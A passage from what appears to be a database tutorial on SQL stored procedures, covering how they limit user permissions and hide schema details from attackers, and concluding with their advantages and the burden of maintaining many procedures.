can access them and how he can use these objects. You can grant the user permission to
execute an SP, even if he doesn’t have permission to use all tables in that procedure. That way,
you’ll be able to limit users to use only these objects you want them to use. Besides that, the
potential attacker won’t be able to see the structure of your database in the code – he’ll only
see the name of the SP you’re calling
Conclusion
Today we took a look at another very important database object we have on the disposal – stored
procedure. They offer a number of advantages. Maybe the biggest disadvantage would be that
you need to take care of a large number of procedures and have a procedure for everything –
from the simplest to very complex tasks. Still, a good naming convention and internal
organization could easily turn this disadvantage into an advantage (by forcing you to follow the
same standards and principles in the whole system + simplifying the documentation and,
therefore, greatly increasing the chance that you’ll generate it).